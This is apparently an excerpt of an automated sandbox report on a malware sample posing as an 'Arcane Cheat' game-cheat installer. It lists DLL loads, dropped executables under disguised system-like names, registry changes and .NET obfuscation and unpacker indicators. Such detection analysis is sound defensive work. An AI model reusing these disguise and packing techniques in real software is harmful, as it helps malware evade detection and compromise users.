            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Recovery\explorer.exeSection loaded: mscoree.dll
            Source: C:\Recovery\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Recovery\explorer.exeSection loaded: version.dll
            Source: C:\Recovery\explorer.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Recovery\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Recovery\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Recovery\explorer.exeSection loaded: wldp.dll
            Source: C:\Recovery\explorer.exeSection loaded: profapi.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Recovery\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Recovery\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Recovery\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\Desktop\uChcvn3L6R.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpWindow found: window name: TSelectLanguageFormJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: Install
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpAutomated click: Next >
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeDirectory created: C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exeJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeDirectory created: C:\Program Files\Uninstall Information\4f78d385fc35a0Jump to behavior
            Source: uChcvn3L6R.exeStatic file information: File size 48732160 > 1048576
            Source: uChcvn3L6R.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2e77600
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000000.1725425677.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: is-LS3UA.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdbY" source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: is-LS3UA.tmp.2.dr
            Source: Binary string: msvcr120.i386.pdb source: is-11A56.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdb source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: is-RMB9M.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: is-G1B5Q.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdbi source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: is-DLMB6.tmp.2.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H System.AppDomain.Load(byte[])
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H System.Reflection.Assembly.Load(byte[])
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H System.AppDomain.Load(byte[])
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H System.Reflection.Assembly.Load(byte[])
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs.Net Code: dudi4Z930H
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeFile created: C:\Surrogateprovidercomponentsessionmonitor\__tmp_rar_sfx_access_check_6396203Jump to behavior
            Source: Arcane Cheat.exe.0.drStatic PE information: section name: .didat
            Source: is-TJN2U.tmp.2.drStatic PE information: section name: _RDATA
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083E28C push eax; ret 3_2_0083E2AA
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exeCode function: 3_2_0083ED46 push ecx; ret 3_2_0083ED59
            Source: C:\Windows\addins\audiodg.exeCode function: 38_2_00007FFD9BAABF48 push eax; iretd 38_2_00007FFD9BAABF49
            Source: C:\Recovery\explorer.exeCode function: 44_2_00007FFD9BAABF48 push eax; iretd 44_2_00007FFD9BAABF49
            Source: is-QS1JT.tmp.2.drStatic PE information: section name: .text entropy: 6.90903234258047
            Source: is-11A56.tmp.2.drStatic PE information: section name: .text entropy: 6.95576372950548
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, XZyIViaVc902mYbsOg5.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, fRecg0IMTTg1CmGU2S.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'bKGlX9sOMky7oWBBeOb', 'fIhNYks8eYu6cdN5BrR', 'XCDJrvs6XPCVTNr1BOK', 'yraVoDsLnqag6TnapDB', 'RrU8mUsE0fTk5JM4vBX', 'JUd8RosJWjPLy5wnYBS'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, dG8w5Q3ZanqpB3yOu4.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'TJyQ8S1NHjIeQHvys8r', 'uKweZP1qLYaplZcBjwX', 'tnuD4815rV9LGP8jjot', 'jefSCA1Crr8CYMkjFqj', 'p4LurG1WRkrw7gbSfF0', 'yHcgxV198XMsa1f1FQC'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, U9dpYvaqrUuBWyCKLLS.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'wWaduabi4E', 'l5NdLGfN7I', 'plidd3HtAD', 'F0IdjXUlPt', 'RgHdVisMBP', 'DVWdxqZiRk', 'RYDgfOpqiZLGE7BAOfx'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, frKviVDZDMThE4ByFj.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'IWaT6EDpA', 'kf5XB3vraB0YOfKv72c', 'yLXkE8vNOiXv2sRNsn7', 'W7PQmVvqwRmr6lGgfa7', 'rc4VmBv5EsiWdXvWQBr', 'HliAJNvCAfikXbytA1n'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, vfL4JnYPjnWYvURPg4.csHigh entropy of concatenated method names: 'P4jr3T6LY', 'Xejw3QRSUOBUSwgPVR', 'f2WyN5hU0erlg0PI33', 'J7TAKketddD4wvjhpU', 'vmSUDpQVt1fbhu4lCQ', 'LtVcpCr98OEyqcffyr', 'DAfO0WPKf', 'VGriVQ2Gw', 'k8CYJEkJi', 'ElKq0v5Zo'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, wu1K5qe49mDbXhwNpC5.csHigh entropy of concatenated method names: 'v5L2xQBpk8', 'tXy2ArksbF', 'sZy2FBnoSC', 'dsW2QSyNks', 'uACqL1Uz42xJlT0w7E5', 'dmXOccUnBP0o69uQruI', 'eFokPsUDH4yZyCOdqTZ', 'LHVkroijhcXvqsCBybr', 'Q08rKeib9cjE6rBaxkT', 'xK5HPFiv1NPkFRGaXjC'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, uinPtEKX5ks0wPYAoBT.csHigh entropy of concatenated method names: 'znIOu0xDow', 'VfmOLaqhQm', 'hD2OdKqstp', 'vtHKOa8RYLcfA7lVEA3', 'wjuhIp8QrZeXbPOnLv6', 'Qk0ou68r3Rya1YcJdDQ', 'iQPR1Z8NEgaO6v4Ad2S', 'hv0lmP8qGjW6mjKiKtu', 'RVIZDf85t5531duIW99', 'kuF16a8hXPwlqFw21uK'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, f0JYAF43V2JVkapeTEx.csHigh entropy of concatenated method names: 'K2EZa0Anob', 'xMjLsA4qdXBMflIJwtA', 'UvRByl45H30X5mnE4Zq', 'bTmuft4rJ95H2pcO0uk', 'C86Vch4NxFwQNAmD9DO', 'Xw7bIF4CHjNbfpRtOYP', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, XGrKZ74NbqtEXEJqRoy.csHigh entropy of concatenated method names: 'sAtO865wYV', 'umrOvSklTv', 'QrnF2ZO8pOywPeGtd5l', 'flkvC4O4w9we4oKBuQV', 'Gkt3k9OOg7RyroCUSyH', 'xGCW5kO6bGW8GWa1ND4', 'n388DAOLErYDg3rTZkN', 'J7ZDkIOEWlSDiabZFYs', 'D4LgoqOJ58LXydHHr0d', 'FNejh6Od8c458ipfxdf'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, hYBAAPaEELKA7GGeEgB.csHigh entropy of concatenated method names: 'FtuLJem7ct', 'asNLymt0N7', 'mmXLomVqLo', 'SY7LcNjPlk', 'MebLs9EX7W', 'oaHb3XWSETcdYwBJie8', 'wr3QVEWnIedueBTSEce', 'W7bcKiWD5NFhNwrYceN', 'j1tsu5WzbpyKvDr6JJD', 'bXYUET9jQXPNUx71wGt'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Grshth4pEm8N9DZQKQx.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'HoBDQUZjQUKC6x54pa7', 'UtIrFdZbSpuQgPl3T3Y', 'q0nLCBZvaFoGQ7OxJLP', 'gfCkZhZ113A6ui3EDMN', 'ceZwqmZswVn9t0Aev7j', 'BSLAJ2ZG11AnpGFAcQl'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, ApSAAkSNXsI9QTfjE7.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'oV8IEFG7dgKs1P6C7oj', 'y2GRXtGAGpnNI6iTTQF', 'zlT3KuG3wB7lmDT9kcD', 'mQR8VkGSOagio9Swvyb', 'OXGIUXGnnvDfFIIxkGU', 'uh4OgoGD4yLWC9YUort'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Ly3Q2KKfs8gHJxm1oP7.csHigh entropy of concatenated method names: 'THRiabScEt', 'aL0iWtNccZ', 'qSTOoEEi9tsCGZM7Qo4', 'ffK6QqEBppydmRhNN8t', 'OMGfJQEVSp2xRbAkSjo', 'BmeLwKEcA53NG4BxylL', 'MEtZBxExnLXwu73dcju', 'LetnCaEtGgtJHa92cMU', 'osY80qEkqUUoBAsS8NE', 'gSBqPCEyCdqSKOTwa5n'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, zVPfdxeIW0Yo89m7eUv.csHigh entropy of concatenated method names: 'sg9', 'v3yP2Gne8m', 'UMX3apd9Z8', 'i3pPI5QMAR', 'kMYKgcxlZTE5QX5WTEU', 'Ho0QfDx0HWllwiVJgUM', 'qxL9MZxmYutZqHKCAj9', 'GjyHs8xoZgrlAkoMuiB', 'ki89JMxuhJULuhSLInP', 'u2Br0YxIvFeppCcOfPx'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, AnHVB64Y36pO8IxLZc7.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'ot4yceYAeq0w8ZSK4Zw', 'IQtTjJY3dvimwhof4Zl', 'REPTd1YSkcUcEdPWwaK', 'vK3vxcYnQ5EMI0XEi9q', 'JZLvG8YDtdnrAG7CvRp', 'zPYDIPYzaxk3aWdYFq9'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, yJx8VDKQf1c6TlIv9FG.csHigh entropy of concatenated method names: 'C3YiN0qgQT', 'wK1OmmE1RNNfZjbsSS3', 'YF6K83EshBDAORcWyyi', 'XE2WdWEbkOgKgRA8Ysu', 'KbxRowEvFFpNbltZjgn', 'wTVCnNEGsiDX4pg7u9E', 'UMZyT4EY059AjkKXLa0', 'UEayiNEgNVhZaLL6dCW', 'qVtwYsEZoukv9D7J9DF', 'UQ4qR9E2NKXhCgK50M8'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.csHigh entropy of concatenated method names: 'HFy3Gmlr6s', 'Bnw3mS3bY4', 'yMi3eIpQ1g', 'E7c8vqcf5nPkj18Lftu', 'JBy8F0c9pmQ4H3VEatW', 'qeN3gfcpe0kGnD92Nmd', 'QLG5yucHeyTqp93BwtI', 'VvK3tJY0ZH', 'h6F321skHo', 'zt93ROo2Ix'
